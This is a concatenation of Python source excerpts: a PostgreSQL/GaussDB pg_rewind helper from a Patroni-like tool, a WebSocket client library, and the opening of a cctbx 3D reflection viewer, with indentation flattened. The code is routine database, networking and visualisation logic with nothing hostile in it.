# prepare pg_rewind connection
r = self._conn_kwargs(leader, self._postgresql.config.rewind_credentials)
# 1. make sure that we are really trying to rewind from the master
# 2. make sure that pg_control contains the new timeline by:
# running a checkpoint or
# waiting until Patroni on the master will expose checkpoint_after_promote=True
checkpoint_status = leader.checkpoint_after_promote if isinstance(leader, Leader) else None
if checkpoint_status is None: # master still runs the old Patroni
leader_status = self._postgresql.checkpoint(self._conn_kwargs(leader, self._postgresql.config.superuser))
if leader_status:
return logger.warning('Can not use %s for rewind: %s', leader.name, leader_status)
elif not checkpoint_status:
return logger.info('Waiting for checkpoint on %s before rewind', leader.name)
elif not self.check_leader_is_not_in_recovery(r):
return
if self.pg_rewind(r):
self._state = REWIND_STATUS.SUCCESS
elif not self.check_leader_is_not_in_recovery(r):
logger.warning('Failed to rewind because master %s became unreachable', leader.name)
else:
logger.error('Failed to rewind from healthy master: %s', leader.name)
for name in ('remove_data_directory_on_rewind_failure', 'remove_data_directory_on_diverged_timelines'):
if self._postgresql.config.get(name):
logger.warning('%s is set. removing...', name)
self._postgresql.remove_data_directory()
self._state = REWIND_STATUS.INITIAL
break
else:
self._state = REWIND_STATUS.FAILED
return False
def reset_state(self):
self._state = REWIND_STATUS.INITIAL
with self._checkpoint_task_lock:
self._checkpoint_task = None
@property
def is_needed(self):
return self._state in (REWIND_STATUS.CHECK, REWIND_STATUS.NEED)
@property
def executed(self):
return self._state > REWIND_STATUS.NOT_NEED
@property
def failed(self):
return self._state == REWIND_STATUS.FAILED
def read_postmaster_opts(self):
"""returns the list of option names/values from postgres.opts, Empty dict if read failed or no file"""
result = {}
try:
with open(os.path.join(self._postgresql.data_dir, 'postmaster.opts')) as f:
data = f.read()
for opt in data.split('" "'):
if '=' in opt and opt.startswith('--'):
name, val = opt.split('=', 1)
result[name.strip('-')] = val.rstrip('"\n')
except IOError:
logger.exception('Error when reading postmaster.opts')
return result
def single_user_mode(self, communicate=None, options=None):
"""run a given command in a single-user mode. If the command is empty - then just start and stop"""
cmd = [self._postgresql.pgcommand('gaussdb'), '--single', '-D', self._postgresql.data_dir]
for opt, val in sorted((options or {}).items()):
cmd.extend(['-c', '{0}={1}'.format(opt, val)])
# need a database name to connect
cmd.append('template1')
return self._postgresql.cancellable.call(cmd, communicate=communicate)
def cleanup_archive_status(self):
status_dir = os.path.join(self._postgresql.wal_dir, 'archive_status')
try:
for f in os.listdir(status_dir):
path = os.path.join(status_dir, f)
try:
if os.path.islink(path):
os.unlink(path)
elif os.path.isfile(path):
os.remove(path)
except OSError:
logger.exception('Unable to remove %s', path)
except OSError:
logger.exception('Unable to list %s', status_dir)
def ensure_clean_shutdown(self):
self.cleanup_archive_status()
# Start in a single user mode and stop to produce a clean shutdown
opts = self.read_postmaster_opts()
opts.update({'archive_mode': 'on', 'archive_command': 'false'})
self._postgresql.config.remove_recovery_conf()
output = {}
ret = self.single_user_mode(communicate=output, options=opts)
if ret != 0:
logger.error('Crash recovery finished with code=%s', ret)
logger.info(' stdout=%s', output['stdout'].decode('utf-8'))
logger.info(' stderr=%s', output['stderr'].decode('utf-8'))
return ret == 0 or None
|
websocket.py
|
"""
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
import socket
try:
import ssl
from ssl import SSLError
HAVE_SSL = True
except ImportError:
# dummy class of SSLError for ssl none-support environment.
class SSLError(Exception):
pass
HAVE_SSL = False
from streamlink.compat import urlparse, range, is_py3
import os
import array
import struct
import uuid
import hashlib
import base64
import threading
import time
import logging
import traceback
import sys
"""
websocket python client.
=========================
This version supports only hybi-13.
Please see http://tools.ietf.org/html/rfc6455 for protocol.
"""
# websocket supported version.
VERSION = 13
# closing frame status codes.
STATUS_NORMAL = 1000
STATUS_GOING_AWAY = 1001
STATUS_PROTOCOL_ERROR = 1002
STATUS_UNSUPPORTED_DATA_TYPE = 1003
STATUS_STATUS_NOT_AVAILABLE = 1005
STATUS_ABNORMAL_CLOSED = 1006
STATUS_INVALID_PAYLOAD = 1007
STATUS_POLICY_VIOLATION = 1008
STATUS_MESSAGE_TOO_BIG = 1009
STATUS_INVALID_EXTENSION = 1010
STATUS_UNEXPECTED_CONDITION = 1011
STATUS_TLS_HANDSHAKE_ERROR = 1015
logger = logging.getLogger()
if is_py3:
unicode = str
class WebSocketException(Exception):
"""
websocket exception class.
"""
pass
class WebSocketConnectionClosedException(WebSocketException):
"""
If the remote host closed the connection or some network error happened,
this exception will be raised.
"""
pass
class WebSocketTimeoutException(WebSocketException):
"""
WebSocketTimeoutException will be raised at socket timeout during read/write data.
"""
pass
default_timeout = None
traceEnabled = False
def enableTrace(tracable):
"""
Turn traceability on or off.
tracable: boolean value. If set to True, traceability is enabled.
"""
global traceEnabled
traceEnabled = tracable
if tracable:
if not logger.handlers:
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.DEBUG)
def setdefaulttimeout(timeout):
"""
Set the global timeout setting to connect.
timeout: default socket timeout time, in seconds.
"""
global default_timeout
default_timeout = timeout
def getdefaulttimeout():
"""
Return the global timeout setting (in seconds) used to connect.
"""
return default_timeout
def _parse_url(url):
"""
parse a url and return a tuple of
(hostname, port, resource path, and a flag indicating secure mode).
url: url string.
"""
if ":" not in url:
raise ValueError("url is invalid")
scheme, url = url.split(":", 1)
parsed = urlparse(url, scheme="http")
if parsed.hostname:
hostname = parsed.hostname
else:
raise ValueError("hostname is invalid")
port = 0
if parsed.port:
port = parsed.port
is_secure = False
if scheme == "ws":
if not port:
port = 80
elif scheme == "wss":
is_secure = True
if not port:
port = 443
else:
raise ValueError("scheme %s is invalid" % scheme)
if parsed.path:
resource = parsed.path
else:
resource = "/"
if parsed.query:
resource += "?" + parsed.query
return (hostname, port, resource, is_secure)
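# For example (illustrative):
#   _parse_url("ws://example.com/chat?x=1")  -> ("example.com", 80, "/chat?x=1", False)
#   _parse_url("wss://example.com/")         -> ("example.com", 443, "/", True)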
def create_connection(url, timeout=None, **options):
"""
Connect to url and return a WebSocket object.
Passing the optional timeout parameter will set the timeout on the socket.
If no timeout is supplied, the global default timeout setting returned by getdefaulttimeout() is used.
You can customize using 'options'.
If you set "header" list object, you can set your own custom header.
>>> conn = create_connection("ws://echo.websocket.org/",
... header=["User-Agent: MyProgram",
... "x-custom: header"])
timeout: socket timeout time. This value is integer.
if you set None for this value, it means "use default_timeout value"
options: current support option is only "header".
if you set header as dict value, the custom HTTP headers are added.
"""
sockopt = options.get("sockopt", [])
sslopt = options.get("sslopt", {})
websock = WebSocket(sockopt=sockopt, sslopt=sslopt)
websock.settimeout(timeout if timeout is not None else default_timeout)
websock.connect(url, **options)
return websock
_MAX_INTEGER = (1 << 32) - 1
_AVAILABLE_KEY_CHARS = list(range(0x21, 0x2f + 1)) + list(range(0x3a, 0x7e + 1))
_MAX_CHAR_BYTE = (1 << 8) - 1
# ref. Websocket gets an update, and it breaks stuff.
# http://axod.blogspot.com/2010/06/websocket-gets-update-and-it-breaks.html
def _create_sec_websocket_key():
uid = uuid.uuid4()
return base64.encodestring(uid.bytes).strip()
_HEADERS_TO_CHECK = {
"upgrade": "websocket",
"connection": "upgrade",
}
class ABNF(object):
"""
ABNF frame class.
see http://tools.ietf.org/html/rfc5234
and http://tools.ietf.org/html/rfc6455#section-5.2
"""
# operation code values.
OPCODE_CONT = 0x0
OPCODE_TEXT = 0x1
OPCODE_BINARY = 0x2
OPCODE_CLOSE = 0x8
OPCODE_PING = 0x9
OPCODE_PONG = 0xa
# available operation code value tuple
OPCODES = (OPCODE_CONT, OPCODE_TEXT, OPCODE_BINARY, OPCODE_CLOSE,
OPCODE_PING, OPCODE_PONG)
# opcode human readable string
OPCODE_MAP = {
OPCODE_CONT: "cont",
OPCODE_TEXT: "text",
OPCODE_BINARY: "binary",
OPCODE_CLOSE: "close",
OPCODE_PING: "ping",
OPCODE_PONG: "pong"
}
# data length threshold.
LENGTH_7 = 0x7d
LENGTH_16 = 1 << 16
LENGTH_63 = 1 << 63
def __init__(self, fin=0, rsv1=0, rsv2=0, rsv3=0,
opcode=OPCODE_TEXT, mask=1, data=""):
"""
Constructor for ABNF.
please check RFC for arguments.
"""
self.fin = fin
self.rsv1 = rsv1
self.rsv2 = rsv2
self.rsv3 = rsv3
self.opcode = opcode
self.mask = mask
self.data = data
self.get_mask_key = os.urandom
def __str__(self):
return "fin=" + str(self.fin) \
+ " opcode=" + str(self.opcode) \
+ " data=" + str(self.data)
@staticmethod
def create_frame(data, opcode):
"""
create a frame to send text, binary and other data.
data: data to send. This is a string value (byte array).
if opcode is OPCODE_TEXT and this value is unicode,
the data is encoded to a utf-8 byte string automatically.
opcode: operation code. please see OPCODE_XXX.
"""
if opcode == ABNF.OPCODE_TEXT and isinstance(data, unicode):
data = data.encode("utf-8")
# mask must be set if send data from client
return ABNF(1, 0, 0, 0, opcode, 1, data)
def format(self):
"""
format this object to string(byte array) to send data to server.
"""
if any(x not in (0, 1) for x in [self.fin, self.rsv1, self.rsv2, self.rsv3]):
raise ValueError("not 0 or 1")
if self.opcode not in ABNF.OPCODES:
raise ValueError("Invalid OPCODE")
length = len(self.data)
if length >= ABNF.LENGTH_63:
raise ValueError("data is too long")
frame_header = chr(self.fin << 7
| self.rsv1 << 6 | self.rsv2 << 5 | self.rsv3 << 4
| self.opcode)
if length < ABNF.LENGTH_7:
frame_header += chr(self.mask << 7 | length)
elif length < ABNF.LENGTH_16:
frame_header += chr(self.mask << 7 | 0x7e)
frame_header += struct.pack("!H", length)
else:
frame_header += chr(self.mask << 7 | 0x7f)
frame_header += struct.pack("!Q", length)
if not self.mask:
return frame_header + self.data
else:
mask_key = self.get_mask_key(4)
return frame_header + self._get_masked(mask_key)
def _get_masked(self, mask_key):
s = ABNF.mask(mask_key, self.data)
return mask_key + "".join(s)
@staticmethod
def mask(mask_key, data):
"""
mask or unmask data. Just do xor for each byte
mask_key: 4 byte string(byte).
data: data to mask/unmask.
"""
_m = array.array("B", mask_key)
_d = array.array("B", data)
for i in list(range(len(_d))):
_d[i] ^= _m[i % 4]
return _d.tostring()
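# Masking is a per-byte XOR, so applying the same key twice restores the original
# payload (illustrative, using the byte strings this module expects):
#   masked = ABNF.mask("abcd", "hello")
#   ABNF.mask("abcd", masked) == "hello"   # True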
class WebSocket(object):
"""
Low level WebSocket interface.
This class is based on
The WebSocket protocol draft-hixie-thewebsocketprotocol-76
http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
We can connect to the websocket server and send/receive data.
The following example is an echo client.
>>> import websocket
>>> ws = websocket.WebSocket()
>>> ws.connect("ws://echo.websocket.org")
>>> ws.send("Hello, Server")
>>> ws.recv()
'Hello, Server'
>>> ws.close()
get_mask_key: a callable to produce new mask keys, see the set_mask_key
function's docstring for more details
sockopt: values for socket.setsockopt.
sockopt must be a tuple and each element is an argument of sock.setsockopt.
sslopt: dict object for ssl socket option.
"""
def __init__(self, get_mask_key=None, sockopt=None, sslopt=None):
"""
Initialize WebSocket object.
"""
if sockopt is None:
sockopt = []
if sslopt is None:
sslopt = {}
self.connected = False
self.sock = socket.socket()
for opts in sockopt:
self.sock.setsockopt(*opts)
self.sslopt = sslopt
self.get_mask_key = get_mask_key
# Buffers packets from the layer beneath until the desired number
# of bytes has been received.
self._recv_buffer = []
# These buffer the build-up of a single frame.
self._frame_header = None
self._frame_length = None
self._frame_mask = None
self._cont_data = None
def fileno(self):
return self.sock.fileno()
def set_mask_key(self, func):
"""
Set the function used to create mask keys. You can customize the mask key generator.
Mainly, this is for testing purposes.
func: callable object. It must take one integer argument,
the length of the mask key, and return a string (byte array)
of that length.
"""
self.get_mask_key = func
def gettimeout(self):
"""
Get the websocket timeout(second).
"""
return self.sock.gettimeout()
def settimeout(self, timeout):
"""
Set the timeout to the websocket.
timeout: timeout time(second).
"""
self.sock.settimeout(timeout)
timeout = property(gettimeout, settimeout)
def connect(self, url, **options):
"""
Connect to url. The url must use the websocket scheme, e.g. ws://host:port/resource
You can customize using 'options'.
If you set "header" dict object, you can set your own custom header.
>>> ws = WebSocket()
>>> ws.connect("ws://echo.websocket.org/",
... header={"User-Agent: MyProgram",
... "x-custom: header"})
timeout: socket timeout time. This value is integer.
if you set None for this value,
it means "use default_timeout value"
options: current support option is only "header".
if you set header as dict value,
the custom HTTP headers are added.
"""
hostname, port, resource, is_secure = _parse_url(url)
# TODO: we need to support proxy
self.sock.connect((hostname, port))
if is_secure:
if HAVE_SSL:
if self.sslopt is None:
sslopt = {}
else:
sslopt = self.sslopt
self.sock = ssl.wrap_socket(self.sock, **sslopt)
else:
raise WebSocketException("SSL not available.")
self._handshake(hostname, port, resource, **options)
def _handshake(self, host, port, resource, **options):
sock = self.sock
headers = []
headers.append("GET %s HTTP/1.1" % resource)
headers.append("Upgrade: websocket")
headers.append("Connection: Upgrade")
if port == 80:
hostport = host
else:
hostport = "%s:%d" % (host, port)
headers.append("Host: %s" % hostport)
if "origin" in options:
headers.append("Origin: %s" % options["origin"])
else:
headers.append("Origin: http://%s" % hostport)
key = _create_sec_websocket_key()
headers.append("Sec-WebSocket-Key: %s" % key)
headers.append("Sec-WebSocket-Version: %s" % VERSION)
if "header" in options:
headers.extend(options["header"])
headers.append("")
headers.append("")
header_str = "\r\n".join(headers)
self._send(header_str)
if traceEnabled:
logger.debug("--- request header ---")
logger.debug(header_str)
logger.debug("-----------------------")
status, resp_headers = self._read_headers()
if status != 101:
self.close()
raise WebSocketException("Handshake Status %d" % status)
success = self._validate_header(resp_headers, key)
if not success:
self.close()
raise WebSocketException("Invalid WebSocket Header")
self.connected = True
def _validate_header(self, headers, key):
for k, v in _HEADERS_TO_CHECK.iteritems():
r = headers.get(k, None)
if not r:
return False
r = r.lower()
if v != r:
return False
result = headers.get("sec-websocket-accept", None)
if not result:
return False
result = result.lower()
value = key + "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
hashed = base64.encodestring(hashlib.sha1(value).digest()).strip().lower()
return hashed == result
def _read_headers(self):
status = None
headers = {}
if traceEnabled:
logger.debug("--- response header ---")
while True:
line = self._recv_line()
if line == "\r\n":
break
line = line.strip()
if traceEnabled:
logger.debug(line)
if not status:
status_info = line.split(" ", 2)
status = int(status_info[1])
else:
kv = line.split(":", 1)
if len(kv) == 2:
key, value = kv
headers[key.lower()] = value.strip().lower()
else:
raise WebSocketException("Invalid header")
if traceEnabled:
logger.debug("-----------------------")
return status, headers
def send(self, payload, opcode=ABNF.OPCODE_TEXT):
"""
Send the data as string.
payload: Payload must be utf-8 string or unicode,
if the opcode is OPCODE_TEXT.
Otherwise, it must be string(byte array)
opcode: operation code to send. Please see OPCODE_XXX.
"""
frame = ABNF.create_frame(payload, opcode)
if self.get_mask_key:
frame.get_mask_key = self.get_mask_key
data = frame.format()
length = len(data)
if traceEnabled:
logger.debug("send: " + repr(data))
while data:
l = self._send(data)
data = data[l:]
return length
def send_binary(self, payload):
return self.send(payload, ABNF.OPCODE_BINARY)
def ping(self, payload=""):
"""
send ping data.
payload: data payload to send server.
"""
self.send(payload, ABNF.OPCODE_PING)
def pong(self, payload):
"""
send pong data.
payload: data payload to send server.
"""
self.send(payload, ABNF.OPCODE_PONG)
def recv(self):
"""
Receive string data(byte array) from the server.
return value: string(byte array) value.
"""
opcode, data = self.recv_data()
return data
def recv_data(self):
"""
Receive data with operation code.
return value: tuple of operation code and string(byte array) value.
"""
while True:
frame = self.recv_frame()
if not frame:
# handle error:
# 'NoneType' object has no attribute 'opcode'
raise WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY, ABNF.OPCODE_CONT):
if frame.opcode == ABNF.OPCODE_CONT and not self._cont_data:
raise WebSocketException("Illegal frame")
if self._cont_data:
self._cont_data[1] += frame.data
else:
self._cont_data = [frame.opcode, frame.data]
if frame.fin:
data = self._cont_data
self._cont_data = None
return data
elif frame.opcode == ABNF.OPCODE_CLOSE:
self.send_close()
return (frame.opcode, None)
elif frame.opcode == ABNF.OPCODE_PING:
self.pong(frame.data)
def recv_frame(self):
"""
receive data as a frame from the server.
return value: ABNF frame object.
"""
# Header
if self._frame_header is None:
self._frame_header = self._recv_strict(2)
b1 = ord(self._frame_header[0])
fin = b1 >> 7 & 1
rsv1 = b1 >> 6 & 1
rsv2 = b1 >> 5 & 1
rsv3 = b1 >> 4 & 1
opcode = b1 & 0xf
b2 = ord(self._frame_header[1])
has_mask = b2 >> 7 & 1
# Frame length
if self._frame_length is None:
length_bits = b2 & 0x7f
if length_bits == 0x7e:
length_data = self._recv_strict(2)
self._frame_length = struct.unpack("!H", length_data)[0]
elif length_bits == 0x7f:
length_data = self._recv_strict(8)
self._frame_length = struct.unpack("!Q", length_data)[0]
else:
self._frame_length = length_bits
# Mask
if self._frame_mask is None:
self._frame_mask = self._recv_strict(4) if has_mask else ""
# Payload
payload = self._recv_strict(self._frame_length)
if has_mask:
payload = ABNF.mask(self._frame_mask, payload)
# Reset for next frame
self._frame_header = None
self._frame_length = None
self._frame_mask = None
return ABNF(fin, rsv1, rsv2, rsv3, opcode, has_mask, payload)
def send_close(self, status=STATUS_NORMAL, reason=""):
"""
send close data to the server.
status: status code to send. see STATUS_XXX.
reason: the reason to close. This must be string.
"""
if status < 0 or status >= ABNF.LENGTH_16:
raise ValueError("code is invalid range")
self.send(struct.pack('!H', status) + reason, ABNF.OPCODE_CLOSE)
def close(self, status=STATUS_NORMAL, reason=""):
"""
Close Websocket object
status: status code to send. see STATUS_XXX.
reason: the reason to close. This must be string.
"""
try:
self.sock.shutdown(socket.SHUT_RDWR)
except:
pass
'''
if self.connected:
if status < 0 or status >= ABNF.LENGTH_16:
raise ValueError("code is invalid range")
try:
self.send(struct.pack('!H', status) + reason, ABNF.OPCODE_CLOSE)
timeout = self.sock.gettimeout()
self.sock.settimeout(3)
try:
frame = self.recv_frame()
if logger.isEnabledFor(logging.ERROR):
recv_status = struct.unpack("!H", frame.data)[0]
if recv_status != STATUS_NORMAL:
logger.error("close status: " + repr(recv_status))
except:
pass
self.sock.settimeout(timeout)
self.sock.shutdown(socket.SHUT_RDWR)
except:
pass
'''
self._closeInternal()
def _closeInternal(self):
self.connected = False
self.sock.close()
def _send(self, data):
try:
return self.sock.send(data)
except socket.timeout as e:
raise WebSocketTimeoutException(e.args[0])
except Exception as e:
if "timed out" in e.args[0]:
raise WebSocketTimeoutException(e.args[0])
else:
raise e
def _recv(self, bufsize):
try:
bytes = self.sock.recv(bufsize)
except socket.timeout as e:
raise WebSocketTimeoutException(e.args[0])
except SSLError as e:
if e.args[0] == "The read operation timed out":
raise WebSocketTimeoutException(e.args[0])
else:
raise
if not bytes:
raise WebSocketConnectionClosedException()
return bytes
def _recv_strict(self, bufsize):
shortage = bufsize - sum(len(x) for x in self._recv_buffer)
while shortage > 0:
bytes = self._recv(shortage)
self._recv_buffer.append(bytes)
shortage -= len(bytes)
unified = "".join(self._recv_buffer)
if shortage == 0:
self._recv_buffer = []
return unified
else:
self._recv_buffer = [unified[bufsize:]]
return unified[:bufsize]
def _recv_line(self):
line = []
while True:
c = self._recv(1)
line.append(c)
if c == "\n":
break
return "".join(line)
class WebSocketApp(object):
"""
Higher-level APIs are provided.
The interface is like the JavaScript WebSocket object.
"""
def __init__(self, url, header=[],
on_open=None, on_message=None, on_error=None,
on_close=None, keep_running=True, get_mask_key=None):
"""
url: websocket url.
header: custom header for websocket handshake.
on_open: callable object which is called at opening websocket.
this function has one argument. The argument is this class object.
on_message: callable object which is called when data is received.
on_message has 2 arguments.
The 1st argument is this class object.
The 2nd argument is the utf-8 string which we get from the server.
on_error: callable object which is called when we get an error.
on_error has 2 arguments.
The 1st argument is this class object.
The 2nd argument is the exception object.
on_close: callable object which is called when the connection is closed.
this function has one argument. The argument is this class object.
keep_running: a boolean flag indicating whether the app's main loop should
keep running, defaults to True
get_mask_key: a callable to produce new mask keys, see the WebSocket.set_mask_key's
docstring for more information
"""
self.url = url
self.header = header
self.on_open = on_open
self.on_message = on_message
self.on_error = on_error
self.on_close = on_close
self.keep_running = keep_running
self.get_mask_key = get_mask_key
self.sock = None
def send(self, data, opcode=ABNF.OPCODE_TEXT):
"""
send message.
data: message to send. If you set opcode to OPCODE_TEXT, data must be utf-8 string or unicode.
opcode: operation code of data. default is OPCODE_TEXT.
"""
if self.sock.send(data, opcode) == 0:
raise WebSocketConnectionClosedException()
def close(self):
"""
close websocket connection.
"""
self.keep_running = False
if self.sock is not None:
self.sock.close()
def _send_ping(self, interval):
while True:
for i in list(range(interval)):
time.sleep(1)
if not self.keep_running:
return
self.sock.ping()
def run_forever(self, sockopt=None, sslopt=None, ping_interval=0):
"""
run the event loop for the WebSocket framework.
This is an infinite loop that stays alive while the websocket is available.
sockopt: values for socket.setsockopt.
sockopt must be a tuple and each element is an argument of sock.setsockopt.
sslopt: ssl socket optional dict.
ping_interval: automatically send a "ping" command every specified period (seconds).
if set to 0, pings are not sent automatically.
"""
if sockopt is None:
sockopt = []
if sslopt is None:
sslopt = {}
if self.sock:
raise WebSocketException("socket is already opened")
thread = None
try:
self.sock = WebSocket(self.get_mask_key, sockopt=sockopt, sslopt=sslopt)
self.sock.settimeout(default_timeout)
self.sock.connect(self.url, header=self.header)
self._callback(self.on_open)
if ping_interval:
thread = threading.Thread(target=self._send_ping, args=(ping_interval,))
thread.setDaemon(True)
thread.start()
while self.keep_running:
try:
data = self.sock.recv()
if data is None or self.keep_running == False:
break
self._callback(self.on_message, data)
except Exception as e:
# print str(e.args[0])
if "timed out" not in e.args[0]:
raise e
except Exception as e:
self._callback(self.on_error, e)
finally:
if thread:
self.keep_running = False
self.sock.close()
self._callback(self.on_close)
self.sock = None
def _callback(self, callback, *args):
if callback:
try:
callback(self, *args)
except Exception as e:
logger.error(e)
if logger.isEnabledFor(logging.DEBUG):
_, _, tb = sys.exc_info()
traceback.print_tb(tb)
if __name__ == "__main__":
enableTrace(True)
ws = create_connection("ws://echo.websocket.org/")
print("Sending 'Hello, World'...")
ws.send("Hello, World")
print("Sent")
print("Receiving...")
result = ws.recv()
print("Received '%s'" % result)
ws.close()
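# --- Added illustration: a minimal, hedged sketch of the callback-based API ---
# The demo above uses create_connection(); the WebSocketApp class defined in this
# module offers the callback style instead. The handler names and the echo URL
# below are illustrative assumptions, not part of the original module.
def _demo_websocketapp(url="ws://echo.websocket.org/"):
    def on_open(ws):
        ws.send("Hello, World")

    def on_message(ws, message):
        print("Received '%s'" % message)
        ws.close()

    def on_error(ws, error):
        print("Error: %s" % error)

    app = WebSocketApp(url, on_open=on_open, on_message=on_message, on_error=on_error)
    # run_forever() blocks until close() is called from a callback or an error occurs.
    app.run_forever()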
|
jsview_3d.py
|
# TODO:
# - cached scenes
from __future__ import division
from libtbx.math_utils import roundoff
from cctbx.miller import display2 as display
from cctbx.array_family import flex
from scitbx import graphics_utils
from cctbx import miller
from libtbx.utils import Sorry
from websocket_server import WebsocketServer
import threading, math, sys
from time import sleep
import os.path, time
import libtbx
import numpy as np
import webbrowser, tempfile
class ArrayInfo:
def __init__(self, millarr):
from iotbx.gui_tools.reflections import get_array_description
data = millarr.data()
if (isinstance(data, flex.int)):
data = [e for e in data if e!= display.inanval]
if millarr.is_complex_array():
data = flex.abs(millarr.data())
self.maxdata =max( data )
self.mindata =min( data )
self.maxsigmas = self.minsigmas = display.nanval
if millarr.sigmas() is not None:
data = millarr.sigmas()
self.maxsigmas =max( data )
self.minsigmas =min( data )
self.minmaxstr = "MinMaxValues:[%s; %s], MinMaxSigmaValues:[%s; %s]" \
%(roundoff(self.mindata), roundoff(self.maxdata), \
roundoff(self.minsigmas), roundoff(self.maxsigmas))
else:
self.minmaxstr = "MinMaxValues:[%s; %s]" %(roundoff(self.mindata), roundoff(self.maxdata))
self.labels = self.desc = ""
if millarr.info():
self.labels = millarr.info().label_string()
self.desc = get_array_description(millarr)
self.span = "HKLs: %s to %s" % \
( millarr.index_span().min(), millarr.index_span().max())
self.infostr = "%s (%s), %s %s, %s, d_min: %s" % \
(self.labels, self.desc, millarr.size(), self.span, self.minmaxstr, roundoff(millarr.d_min()))
class hklview_3d:
def __init__ (self, *args, **kwds) :
self.settings = kwds.get("settings")
self.miller_array = None
self.d_min = None
self.scene = None
self.NGLscriptstr = ""
self.cameratype = "orthographic"
self.url = ""
self.binarray = "Resolution"
self.icolourcol = 0
self.iradiicol = 0
self.isnewfile = False
self.binvals = []
self.workingbinvals = []
self.valid_arrays = []
self.otherscenes = []
self.othermaxdata = []
self.othermindata = []
self.othermaxsigmas = []
self.otherminsigmas = []
self.matchingarrayinfo = []
self.binstrs = []
self.mapcoef_fom_dict = {}
self.mprint = sys.stdout.write
if 'mprint' in kwds:
self.mprint = kwds['mprint']
self.nbin = 0
self.websockclient = None
self.lastmsg = ""
self.StartWebsocket()
tempdir = tempfile.gettempdir()
self.hklfname = os.path.join(tempdir, "hkl.htm" )
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
if 'htmlfname' in kwds:
self.hklfname = kwds['htmlfname']
self.hklfname = os.path.abspath( self.hklfname )
self.jscriptfname = os.path.join(tempdir, "hkljstr.js")
if os.path.isfile(self.jscriptfname):
os.remove(self.jscriptfname)
if 'jscriptfname' in kwds:
self.jscriptfname = kwds['jscriptfname']
self.hklhtml = r"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta charset="utf-8" />
</head>
<body>
<script src="%s" type="text/javascript"></script>
<script src="%s" type="text/javascript"></script>
"""
self.htmldiv = """
<div id="viewport" style="width:100%; height:100%;"></div>
</body></html>
"""
self.colourgradientvalues = []
self.UseOSBrowser = True
if 'UseOSBrowser' in kwds:
self.UseOSBrowser = kwds['UseOSBrowser']
self.viewmtrxelms = None
self.pendingmessage = None
def __exit__(self, exc_type, exc_value, traceback):
# not called unless instantiated with a "with hklview_3d ... " statement
self.server.shutdown()
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
def set_miller_array (self, miller_array, merge=None, details="", valid_arrays=[]) :
if (miller_array is None):
return
self.miller_array = miller_array
self.valid_arrays = valid_arrays
self.merge = merge
self.d_min = miller_array.d_min()
array_info = miller_array.info()
self.binvals = [ miller_array.d_max_min()[1], miller_array.d_max_min()[0] ]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
uc = "a=%g b=%g c=%g angles=%g,%g,%g" % miller_array.unit_cell().parameters()
self.mprint( "Data: %s %s, %d reflections in space group: %s, unit cell: %s" \
% (array_info.label_string(), details, miller_array.indices().size(), \
miller_array.space_group_info(), uc) )
self.construct_reciprocal_space(merge=merge)
def construct_reciprocal_space (self, merge=None) :
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
matchcolourindices = miller.match_indices(self.miller_array.indices(),
self.valid_arrays[self.icolourcol].indices() )
matchcolourarray = self.miller_array.select( matchcolourindices.pairs().column(0) )
matchradiiindices = miller.match_indices(self.miller_array.indices(),
self.valid_arrays[self.iradiicol ].indices() )
matchradiiarray = self.miller_array.select( matchradiiindices.pairs().column(0) )
matchcolourradiiindices = miller.match_indices(self.valid_arrays[self.icolourcol].indices(),
self.valid_arrays[self.iradiicol ].indices() )
#matchcolourradiiindices = miller.match_indices(matchcolourarray.indices(),
# matchradiiarray.indices() )
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#matchcolourradiiarray = self.miller_array.select( matchcolourradiiindices.pairs().column(0) )
#commonindices = miller.match_indices(self.miller_array.indices(),
# matchcolourradiiarray.indices() )
commonindices = miller.match_indices(self.miller_array.indices(),
matchcolourradiiindices.paired_miller_indices(0) )
commonarray = self.miller_array.select( commonindices.pairs().column(0) )
commonarray.set_info(self.miller_array.info() )
commonarray.sort(by_value="packed_indices")
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#commonarray.size(), matchcolourradiiarray.size(), matchradiiarray.size(), matchcolourarray.size()
foms_array = None
if self.miller_array.is_complex_array():
fomcolm = self.mapcoef_fom_dict.get(self.miller_array.info().label_string())
if fomcolm:
#foms = self.valid_arrays[fomcolm].data().deep_copy()
foms_array = self.valid_arrays[fomcolm].deep_copy()
self.scene = display.scene(miller_array=self.miller_array, merge=merge,
settings=self.settings, foms_array=foms_array)
self.rotation_center = (0,0,0)
self.otherscenes = []
self.othermaxdata = []
self.othermindata = []
self.matchingarrayinfo = []
match_valarrays = []
# loop over all miller arrays to find the subsets of hkls common between the currently selected
# miller array and the other arrays. hkls found in the currently selected miller array but
# missing in the subsets are populated with NaN values
for i,validarray in enumerate(self.valid_arrays):
# first match indices in currently selected miller array with indices in the other miller arrays
#matchindices = miller.match_indices(matchcolourradiiarray.indices(), validarray.indices() )
matchindices = miller.match_indices(self.miller_array.indices(), validarray.indices() )
#matchindices = miller.match_indices( commonarray.indices(), validarray.indices() )
#print validarray.info().label_string()
valarray = validarray.select( matchindices.pairs().column(1) )
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if valarray.anomalous_flag() and not self.miller_array.anomalous_flag():
# valarray gets its anomalous_flag from validarray. But it cannot have more HKLs than self.miller_array
# so set its anomalous_flag to False if self.miller_array is not anomalous data
valarray._anomalous_flag = False
